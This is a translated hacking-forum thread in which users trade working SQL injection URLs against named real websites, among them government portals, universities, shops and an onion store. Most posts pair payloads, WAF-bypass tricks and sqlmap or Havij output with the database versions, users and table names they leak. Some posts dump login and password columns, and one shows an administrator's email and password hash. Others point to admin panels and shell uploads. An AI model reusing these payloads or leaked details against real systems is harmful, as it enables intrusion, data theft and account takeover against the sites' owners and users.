View full version: SQL Injections
Post the SQL injections you find here. Before posting, check whether the SQLi has already been posted:
Code:
Google: site:forum.antichat.ru [your site with SQLi]
Previous thread: /threads/21336/ (https://antichat.live/threads/21336/)
ATTENTION!!! Wrap all injections in the [ CODE ] [ / CODE ] tag; there must be no [ URL ] [ / URL ] tags.
Rules of this thread:
Injections of the form:
Code:
http://site.ru/index.php?a='
will be deleted. It is also advisable to state the DB version in the post.
Posting passwords and hashes for admin panels in this thread is prohibited. They will be deleted, and violators will be punished.
Flaming/off-topic is deleted and harshly punished.
kingbeef
29.04.2015, 13:51
SQLi with output in the address bar
Code:
http://www.mmlf.ru/?go=members&sid=29%27+and+0+union+select+1,2,3,4,5,6,version() ,8,9,10,11,12,13--+k
5.5.36-34.0-632.precise
Code:
http://machouse.ua/solutions/s2/pre-press/sys_ctp/treatment_digital_pl/g-j-raptor--85-polymer-cou-dlja-fotopolimernykh-plactin"and(select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and".html
(1062) Duplicate entry 'macnew@127.0.0.11' for key 'group_key'
Code:
http://infoeco.ru/ecomobile/index.php?id=34&datePointId=-6755 union select 1,2,3,4,5,6,concat(user(),0x3a,database()),8,9,10, 11,12,13,14--
ecomobil@localhost:ecomobil
Code:
http://landscrona.ru/media/index.php?id=-2825%20union%20select%201,2,3,user%28%29,version%2 8%29,database%28%29,7,8,9,10,11,12,13,14,15--
crona_site 5.5.25 db_crona@localhost
Code:
http://dzz.gov.ua/CPOSI/style/page_2/templer_page2_ru.php?id=21%20union%20select%201,2, 3,concat%28user%28%29,0x3c62723e,version%28%29,0x3 c62723e,database%28%29%29,5,%27fox%20tech%27,7,8--&table=info
znvc@localhost
5.1.73
CPOSI
Code:
http://khersonryboohorona.gov.ua/newscomdet.php?id=5&mod=-393%20union%20select%201,2,concat%28user%28%29,0x3 c62723e,version%28%29,0x3c62723e,database%28%29%29 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--&lang=
ruboohran_riba@192.168.1.28
5.5.27-log
ruboohran_riba
reuvenmatbil
09.05.2015, 11:08
Code:
http://www.satena.com/about-us/board-of-directors/(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117) ,CHAR(75),CHAR(80),CHAR(112),CHAR(53),CHAR(111),CH AR(89),CHAR(89),CHAR(81)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Code:
http://www.astera.ru/it-top/?type=-2'+union+select+1,2,3,4,5,0x456e6a6f7921,7,8,9+--+&year=2015&month=2
Be careful, it's MySQL 4
fakecoder
14.05.2015, 02:28
Code:
invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+
in TITLE
8k hosts/day
for anyone interested in fighting a WAF... though faza has already beaten it...
Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1
CY 250, PR 4
fakecoder said:
↑ (https://antichat.live/posts/3847057/)
for anyone interested in fighting a WAF
Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1
CY 250, PR 4
better to merge the posts
Code:
http://www.mkap.ru/newsview.php?id=-1475+/*!12345union*//*!12345%73%65%6c%65%63%74*/version(),2,3,4--+
5.0.77-log
fakecoder said:
↑ (https://antichat.live/posts/3847052/)
Code:
invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+
in TITLE
8k hosts/day
nothing interesting
Database:
invest-expert
Tables:
table_article
table_banner
table_coment
table_fotos
table_kategorie
table_menue
table_news
table_produkt
table_projects
table_projects_archive
table_text_blocks
table_texte
table_video
Code:
http://frameworksgallery.com/admin/checkuser.php
POST
member_name=k&password=kkkkkk' or 1=1 -- &Submit=Submit
upload the shell as phtml, if anything
Mister_Bert0ni
21.05.2015, 19:21
Code:
http://www.lampbulbs.co.uk/product.php
?prodid=162' +UNION(/**_**/SELECT(1),(2),(concat/**_**/((0x3c62723e),(0x7e7e4d69737465725f42657274306e697 e7e),(
0x3c62723e),(version/**_**/()),(0x3c62723e),(user/**_**/()),(0x3c62723e),(database/**_**/()))),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13), (14),(15),(16),(17),(18),(19),(20),(21),(22),(23), (24),(25),(26),(27),(28),(29),(30),(31),(32),(33), (34),(35),(36),(37),(38),(39),(40),(41),(42))--+
karter_kg
21.05.2015, 23:24
HTML:
http://www.ghanaweb.com/GhanaHomePage/soccer.PredictionLeague/index.php?cmd=showmonthlywinners&month=24121'+and+1=0+union+select+1,2,3,4,@@versio n,6,7,8,9,10,11,12,13,14,user(),16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41+--+
user() =rijk5_w@209.68.59.161
@@version = 5.1.67-log
Alexa = 2,645
karter_kg
23.05.2015, 16:42
Code:
http://www.uvm.edu/crs/sdc/county_result.php?co_id=4'+and+extractvalue(1,conc at(0x3a,(user())))+--+
user()=rural_admin@tubeweb1.uvm.edu
version() =5.5.43-37.2-log
Alexa = 15,582
Code:
http://depts.washington.edu/neurolog/psych/archives/viewPres.php?id=708'and+extractvalue(1,concat(0x3a ,(user())))+--+
user() = root@depts12.u.washington.edu
version() = 5.5.18
http://www.sangean.com/image/LOGO/SANGEAN_LOGO_RED.gif
sangean.com/products/product.asp?mid=40%20or%201=@@version
TIC20 PR4 AR460,627
DezMond™
02.06.2015, 10:27
PR7
Code:
http://www.stevens.edu/provost/oie/view-patent?id=-20100137884+union+select+1,2,3,4,5,6,7,version(),9 ,10,11,12+--+
Drupal
Code:
https://www.stevens.edu/provost/CHANGELOG.txt
how do I find out the DB prefix?
psihoz26
02.06.2015, 14:49
there's no prefix, though
Code:
http://www.stevens.edu/provost/oie/view-patent?id=-20100137884+union+select+1,2,3,4,5,6,7,table_name, 9,10,11,12+from+information_schema.tables+where+ta ble_schema=database()+--+
Code:
http://www.winelabelworld.com/list.php?c=18&w=8+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELEC T+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID(VERSION() ,+1,+63),+FLOOR(RAND(0)*2)))+--+
Query failed: Duplicate entry '5.0.951' for key 1
The site localwineevents.com has the database "lwe", which sits alongside / alexa 163,137
Insaider
05.06.2015, 00:14
Code:
http://education.zyxel.com/ZCNE_Course_Event.asp?cert_id=1' or 1=@@version--
Windows version: 2003
SQL Server version: 2005
Database name: education_3
System user: cso_user
Server name: CSO-ELDB
psihoz26
08.06.2015, 15:02
Squeezed the "maximum" out of error-based )) from a potential vulnerability to the start of the dump in ~5 requests))
Code:
URL: http://2c5whdbcb6m2c2xx.onion/search/1%27%29%09and%09%28%28SELECT%09%28i%09IS%09NOT%09N ULL%29%09-%09-9223372036854775808%09FROM%09%28SELECT%09%28concat %28version%28%29%29%29i%29a%29%29=2--%09
version() = 5.5.43-0+deb7u1
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x 3a,substr(@,1,400),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x 3a,substr(@,300,700),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Result (table names in hoursppc_biznewenc):
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' and @:=CONCAT(@,0x2C,CONCAT(column_name))),@),5)),0x7d 7d7d))i)a)&url=%2Fproducts%2F7
Result (column names in hoursppc_biznewenc.users):
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POST DATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(select length(MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM users WHERE @:=CONCAT(@,0x2C,CONCAT(login,0x3b,email,0x3b,pass word))),@),5))),0x3a,(SELECT mid(@,1,400)),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Result (fragment of select concat(login,0x3b,email,0x3b,password) from hoursppc_biznewenc.users):
Code:
http://forums.sbo.sailboatowners.com/q_login.php?do=login
POST
redirect=http%3A%2F%2Fsbo.sailboatowners.com%2Find ex.php%3Foption%3Dcom_content%26task%3Dview%26id%3 D30%26Itemid%3D64&vb_login_username=asfasf'or(ExtractValue(1,concat( 0x3a,(select+user()))))='1&vb_login_password=asfasf&cookieuser=1&image.x=0&image.y=0&s=&do=login&vb_login_md5password=0a040ec34abbfb7f3030345244a91 3c9&vb_login_md5password_utf=0a040ec34abbfb7f303034524 4a913c9
vB integrated into Joomla; admin panels and so on are hidden everywhere, but everything can be found and uploaded. Maybe someone will be interested in trying
huntercs16
09.06.2015, 23:41
Code:
https://blogs.adobe.com/adobelife/photos/?gid=-1+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a )+)+--+;
runs WP
KAMCHATKA SCIENTIFIC CENTER
Code:
http://www.kscnet.ru/ivs/kvert/volc.php?lang=en&name=99999'+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os),14,15,16,17,18,19,20+--+
TIC 750 PR 5
5.5.30-log
SQLi:
Code:
http://boroughs.org/subpage.php?link=Borough-News-Magazine'+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,conca t_ws(0x3b3c62723e,database(),user(),version(),@@ve rsion_compile_os),7,8,9,10,11+--+
Unknowhacker
17.06.2015, 15:00
http://sanpid.com/images/logo_vs.png
Code:
http://sanpid.com/index.php?page=1&cid=220&pid=-371+union+Select+version%28%29+--+
Version: 5.0.96-community-log
SQLi:
Code:
http://www.rnd.goa.gov.in/content_news_disp.php?id=-14+union+select+1,2,3,4,CONCAT_WS%280x3b3c62723e,u ser%28%29,version%28%29,database%28%29,@@version_c ompile_os%29,6,7,8,9,10,11+--+
rnd@localhost; 5.6.22; rnd
Code:
http://pr.alexa.cn/index.php?url=1' OR EXTRACTVALUE(8396,CONCAT(0x5c,0x716a787171,(SELECT (ELT(8396=8396,1))),0x7171787671)) AND 'BvUT'='BvUT
alexa.cn traffic 590k
error-based
hostname: 'AY12063001214105c7538'
'root'@'127.0.0.1'
Nginx, PHP 5.4.37, MySQL >= 5.0.0
DB list:
alexa
icpdb
information_schema
mysql
performance_schema
test
tour2013
whoisdb
xj_cn_2014
Code:
http://leton.tv/player.php?streampage=tnj1bde' AND (SELECT 4549 FROM(SELECT COUNT(*),CONCAT(0x716a717671,(SELECT (ELT(4549=4549,1))),0x716a6b7871,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Iimq'='Iimq&width=600&height=450
leton.tv traffic 1.6kk, video streaming service
error based
PHP 5.3.3, Nginx, MySQL >= 5.0.0
DBA: True
hostname: 'hostname.change.me'
''@'hostname.change.me'
''@'localhost'
'root'@'127.0.0.1'
'root'@'hostname.change.me'
'root'@'localhost'
DB list:
information_schema
megom
mysql
scorenews
test
wowza
wowza2
wowza2_b1
cashbackmonitor.com traffic 430k, shop comparison
Code:
Parameter: #1* (URI)
AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND 2703=2703 AND 'nUyh'='nUyh
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND (SELECT 2579 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(2579=2579,1))),0x7178787071,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hlmZ'='hlmZ
Title: Generic UNION query (NULL) - 22 columns
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' UNION ALL SELECT NULL,CONCAT(0x716a627671,0x4647646f4f536d657563,0x 7178787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL--
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
available databases [3]:
CashbackMonitor
information_schema
test
-------------------------------------------------------------
sydney.edu.au traffic 2.2kk
Code:
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://sydney.edu.au:80/medicine/public-health/research/publications.php?year=2010' AND (SELECT 5421 FROM(SELECT COUNT(*),CONCAT(0x716a6a7871,(SELECT (ELT(5421=5421,1))),0x716a7a6a71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sBCP'='sBCP
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
available databases [266]:
Code:
https://www.tcd.ie/irishfilm/print.php?search=keyword&q=radharc&exactMatch=&extraSearch=-8628 OR 1 GROUP BY CONCAT(0x716b716271,(SELECT (CASE WHEN (2226=2226) THEN 1 ELSE 0 END)),0x7170787871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
tcd.ie traffic 1.2kk, a college in Ireland
error based
Apache 2.4.10;MySQL >= 5.0.0
Database: filmresearch_db
[6 tables]
+-----------------+
| bibliography |
| biography |
| censor_appeal |
| censor_decision |
| censor_film |
| film |
+-----------------+
Code:
http://bgequipment.powweb.com:80/service_detail.php?ID=1' AND (SELECT 1856 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(1856=1856,1))),0x7176716b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GkPg'='GkPg
powweb.com traffic varies
error based
PHP 5.3.29, Apache 2;MySQL >= 5.0.0
available databases [2]:
bges
information_schema
Code:
http://rid.waipadc.govt.nz/cemetery/cemetery_record_view.php?id=-2774+union+select+1,concat_ws%280x3c62723e,version %28%29,database%28%29,user%28%29%29,NULL,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
cemetery@aoraki.webbase.net.nz;
5.0.51a-24+lenny5-log;
cemetery
Code:
http://www.polarview.aq/old/tablelisting_SAR.php?hemi=S&time=Last+week&area=NewZealand'+and+ascii(substr(version(),6,1))>'113'+and+concat(1,1,1)='111
Nothing interesting, just an "ordinary" PostgreSQL injection on one of Antarctica's sites. Move along.
ocheretko
10.07.2015, 07:02
ASP, MS-SQL
Attack type: Convert INT ODBC Error
Code:
Version - http://nchla.org/issues.asp?ID=1+and+1=convert(int,@@version)--
Code:
User http://nchla.org/issues.asp?ID=1+and+1=convert(int,user_name())--
Code:
Database http://nchla.org/issues.asp?ID=1+and+1=convert(int,db_name())--
Code:
Enumerating database names
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(0))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(1))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(2))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(3))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(4))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(5))--
And the dump
http://i11.pixs.ru/storage/7/3/4/dumppng_3365831_17973734.png
DezMond™
10.07.2015, 15:51
PR7
Code:
http://www7.inra.fr/drh/cr2013/listeparconcours-cr2.php?choix=8&langue=FR+union+select+1,2,3,4,user(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
Mister_Bert0ni
16.07.2015, 15:28
Code:
http://www.compactkitchens.in/productdetail.php?cat_id=.37' and @pipka:=(
(SELECT+GROUP_CONCAT(/*!12345table_name*/,0x2020203a3a3a2020,/*!12345column_name*/+SEPARATOR+0x3c62723e)+FROM+
/*!50000INFORMATION_SCHEMA.columns*/+WHERE+TABLE_SCHEMA=DATABASE/**/()))/*!50000UNIOn*/ SELECT 1,2,3,4,5,6,
concat/**/(0x3c7370616e207374796c653d22666f6e742d66616d696c7 93a4963656c616e643b636f6c6f723a7265643b73697a653a3 53b746578742d736861646f773a23303030203070782030707 820337078223e4d69737465725f42657274306e693c62723e,
0x4461746162617365203a3a202020,DATABASE/**/(),
0x3c62723e506f727420203a3a2020,@@PORT,
0x3c62723e46696c6573797374656d203a3a2020,@@VERSION _COMPILE_OS,0x20203a3a2020,
@@VERSION_COMPILE_MACHINE,
0x3c62723e56657273696f6e206f6620446174616261736520 3a3a2020,version/**/(),0xa3c62723e486f73746e616d65203a3a20,
@@HOSTNAME,
0x3c2f7370616e3e,@pipka),8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25-- -
Code:
http://www.ilovemusica.com/shop.php?cat=.6 UNION SELECT concat(0x3c2f7469746c653e,0x3c63656e7465723e,
0x3c7370616e207374796c653d22666f6e742d66616d696c79 3a4963656c616e643b636f6c6f723a7265643b73697a653a35 3b746578742d736861646f773a233030302030707820307078 20337078223e4d69737465725f42657274306e693c62723e,
0x4461746162617365203a3a202020,DATABASE(),
0x3c62723e506f727420203a3a2020,@@PORT,
0x3c62723e46696c6573797374656d203a3a2020,@@VERSION _COMPILE_OS,0x20203a3a2020,
@@VERSION_COMPILE_MACHINE,
0x3c62723e56657273696f6e206f6620446174616261736520 3a3a2020,version(),0xa3c62723e486f73746e616d65203a 3a20,
@@HOSTNAME,
0x3c2f7370616e3e,(select(@x)from(select(@x:=0x00), (@running_number:=0),(@tbl:=0x00),(select(0)from(i nformation_schema.columns)where(table_schema=datab ase())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tb l!=table_name),Concat(0x3c2f6469763e,LPAD(@running _number:=@running_number%2b1,2,0x30),0x3a292020,0x 3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name, 0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c6469762 07374796c653d226d617267696e2d6c6566743a333070783b2 23e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6 e7420636f6c6f723d626c75653e,column_name,0x3c2f666f 6e743e))))x),0x3c212d2d),null -- -
kingbeef
19.07.2015, 01:44
More...
Output in an alert
Code:
http://www.agriagency.com.ua/comments/10227.html'or(ExtractValue(1,concat(0x3a,(select(v ersion())))))='1
ATTENTION!!! Wrap all injections in the [ CODE ] [ / CODE ] tag; there must be no [ URL ] [ / URL ] tags.
Injections in POST are also posted in [ CODE ] [ /CODE ]
Code:
http://site.zone/index.php?cmd=viewpost
POST:
id=-1'+and+1=2+union+select+1,2,3,4,5,version(),7,8+--+
Text in [ URL ] [ /URL ] gets truncated in length and becomes inconvenient to read, unlike [ CODE ] [ /CODE ]
spherics
28.07.2015, 15:34
Code:
http://www.tv3.ie/news_sub_page.php?locID=1.2.888000+union+select+co ncat_ws(0x3a3a,version(),user(),database())--
Version: 5.0.95-log
user : tv3_readonly@localhost
database: tv3
Hi all!
There's a hole, it gives up the database, but it's joomla 3.3.1 there and it spits out a salted hash
And the filter doesn't let the admin login through(((
Code:
http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=1'
Brute-forcing is pointless there, you have to inject right away
I downloaded the database using the Havij v1.16 tool
Code:
Target: http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=%Inject_Here%
Host IP: 91.236.136.194
Web Server: nginx
DB Server: MySQL error based
Resp. Time(avg): 85 ms
Sql Version: 5.5.43-0+deb7u1-log
Compile OS: debian-linux-gnu
Host Name: ura.webhost1.ru
Current DB: sergei62_og
Installation dir: /usr
admin data
povar.admin@gmail.com
$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO
Couldn't upload(( didn't find the path
Whoever manages to dig it up, PM me (how did you do it?)
P.S. the server filters on the number of requests per minute! So don't rush)))
powerOfthemind
31.07.2015, 15:33
goot said:
↑ (https://antichat.live/posts/3874382/)
Hi all!
There's a hole, it gives up the database, but it's joomla 3.3.1 there and it spits out a salted hash
And the filter doesn't let the admin login through(((
Code:
http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=1'
Brute-forcing is pointless there, you have to inject right away
I downloaded the database using the Havij v1.16 tool
Code:
Target: http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=%Inject_Here%
Host IP: 91.236.136.194
Web Server: nginx
DB Server: MySQL error based
Resp. Time(avg): 85 ms
Sql Version: 5.5.43-0+deb7u1-log
Compile OS: debian-linux-gnu
Host Name: ura.webhost1.ru
Current DB: sergei62_og
Installation dir: /usr
admin data
povar.admin@gmail.com
$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO
Couldn't upload(( didn't find the path
Whoever manages to dig it up, PM me (how did you do it?)
P.S. the server filters on the number of requests per minute! So don't rush)))
The hash looks a lot like OpenBSD Blowfish
I suspect the login will be Admin
Here's what I managed to pull out; I suspect someone has already gotten into the admin panel
Here's what I managed to find on this type of hash; didn't understand any of it, but maybe it'll be useful to someone: http://habrahabr.ru/post/211645/
Code:
http://dir.rusmedserv.com/index.php?t=sub_pages&cat=-4+UNION+SELECT+1,2,user(),4,database(),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20--
And a bonus. Here's an interesting inject. Can't get any further in; if you have ideas, PM me please.
K1nD[e]R
01.08.2015, 13:53
btc
Code:
Post[URL]: http://www.vitalcoin.com/order_ajax_request.php
Post[data]: Action=IsUserLogedIn&TransactionMode=2&TransactionType=PKR and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
Code:
Warning: mysql_query(): Unable to save result set in /home/vitalcoi/public_html/models/order.php on line 88
Duplicate entry '~'vitalcoi_dbuser@localhost'~1' for key 'group_key'
Code:
Admin panel is behind Basic
Mister_Bert0ni
04.08.2015, 16:09
Code:
www.meleeboys.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'
',password),222+from+jos_users--%20-
www.skala-club.vn.ua/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'
',password),222+from+jos_users--%20-
toxic.h5n1.free.fr/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'
',password),222+from+jos_users--%20-
spherics
04.08.2015, 16:32
Code:
http://casu.us/online_programs.php?id=-1+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3,4,5--
5.0.96-log
casuni@184.168.152.78
casuni
Powered By: Friends IT Solution (all full of holes)
Trying to pick them apart themselves.
Unknowhacker
05.08.2015, 13:45
The NORTH FACE
Code:
http://north-face.com.ua/search/?searh=%27and%28select*from%28select%28name_const% 28version%28%29,1%29%29,name_const%28version%28%29 ,1%29%29a%29and%27
Version: 5.5.42-37.1
www.nowinstock.net (http://www.nowinstock.net) traffic 580k
Code:
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 RLIKE (SELECT (CASE WHEN (2936=2936) THEN 1 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 AND EXTRACTVALUE(4360,CONCAT(0x5c,0x71786a6a71,(SELECT (ELT(4360=4360,1))),0x71626a7071))
---
web application technology: Apache
back-end DBMS: MySQL 5.1
Database sdfs4f_main
powerOfthemind
08.08.2015, 19:05
Code:
http://www.pourmaplanete.com/news/novel.php?ID=-151+UNION SELECT 1,user(),version(),4,5,6,7,8,9,10,database(),12,13--
http://www.tovary2.ru/a-general.php?id_gorod=-74+UNION SELECT 1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15,1 6,17,database(),19,20,21,22,23,24,25,26,27,28--
http://velostar.ru/guest.php?active_page=-1500+union+select+1,2,3,4,5,version(),7,8--
Output in title
papersource.com traffic 430k
Code:
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' RLIKE (SELECT (CASE WHEN (4297=4297) THEN 1 ELSE 0x28 END)) AND 'DiTO'='DiTO.html
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' AND EXTRACTVALUE(1565,CONCAT(0x5c,0x71626a6b71,(SELECT (ELT(1565=1565,1))),0x716a787871)) AND 'DncI'='DncI.html
back-end DBMS: MySQL >= 5.0.0
databases:
paper
WallHack
25.08.2015, 22:58
Code:
http://testmat.ru/mat_test.php?id=-2+union+select+1,2,3,4,user,password,7,8,9,10,11,1 2+from+users+--+
Code:
http://www.yarohranatruda.ru/order.php?id=-377%27+union+select+1,admin_name,admin_passwd,4,5+ FrOm+admin+--+
Admin panel
Code:
http://www.yarohranatruda.ru/admin/
Code:
http://russkayabronza.com/1/order.php?id=-866'+union+select+1,2,3,4,5,6,7,8,9+--+
Admin panel
Code:
http://russkayabronza.com/adm.php
Code:
http://koreamed.org/JournalVolume.php?id=-200+union+select+user%28%29--
used together with sqlmap
information_schema
KoreaMed
test
A hellish number of tables, didn't bother.
Code:
http://www.findfilehost.com/filehost.php?id=-2+UNION%20+select%20+%20%201,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21--
mod_secure cuts it off
Code:
http://www.jamrid.com/RiddimDetail.php?ID=-1677+union+select+1,convert%28concat_ws%280x3a3a,v ersion%28%29,user%28%29,database%28%29%29+using+la tin1%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Encoding problem: it outputs incorrectly and you can't simply output version(). You need to use the convert() function
convert(version()+using+latin1)
in the end we get:
4.1.14::soundman@localhost::RiddimDB
WallHack
01.09.2015, 18:27
Code:
http://toefilm.ru/view_post.php?id=-32%27+union+select+1,2,3,4,5,6,7,8,9,10,@@version, 12,13,14,15+--+
Га-Ноцри
16.09.2015, 00:55
An airport, apparently not the smallest in those Europes of yours. There is a filter; it is bypassed by inserting %0B into any part, for example union -> uni%0Bin, information_schema.tables -> infor%0Bmation_schema.tables, and so on by analogy.
TIC == 110, PR == 6, Alexa == 120,422
Code:
http://www.koeln-bonn-airport.de/index.php?id=147&L=0&q=1'or(extractvalue(rand(),concat(0x3a,(Sel%0BeCt( concat_ws(0x3a,version(),user()))))))='1
Online airline ticket booking and everything related to it. Output in the page source
TIC == 10, PR == 0, Alexa == 390,710
Code:
http://www.parkrideflyusa.com/booking-details?id=-31 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x03a,v ersion(),database(),user())--
ButilkaSoka
20.09.2015, 05:11
seems like a lot of total traffic, 2,7kk, a pmi.org subdomain
Code:
http://learning.pmi.org/course-detail.php?id=-3582+union+select+all+1,concat(user(),0x3a,databas e(),0x3c62723e,version()),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37+limit+0,1--
pmiprof@184.168.193.187: pmiprof
5.0.96-log
console games
Code:
https://www.playonrent.com/gameDetails.php?id=137 and (select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Duplicate entry 'A883245_sidhant@173.83.247.2321' for key 'group_key'
5.1.69-community-log
WAF
Code:
http://www.e-wigs.com/wigs.php?id=-1773 UNION SELECT 1,2,3,4,5,concat(user(),0x3a,database(),0x3c62723e ,version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27 limit 0,1
Here is the bypass
Code:
http://www.e-wigs.com/wigs.php?id=-1773/*!union*//*!12345%73%65%6c%65%63%74*/1,2,3,4,5,concat%28user%28%29%2C0x3a%2Cdatabase%28 %29%2C0x3c62723e%2Cversion%28%29%29,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where TABLE_schema=database%28%29 limit 0,1
dbo472536571@74.208.16.148:db472536571
5.1.73-log
Code:
http://www.fckhimki.ru/modules/players/index_d.php?current_id=15&player_id=-111+union+select+1,2,3,4,version(),6,7,8,9,10 --
5.0.90-log
Code:
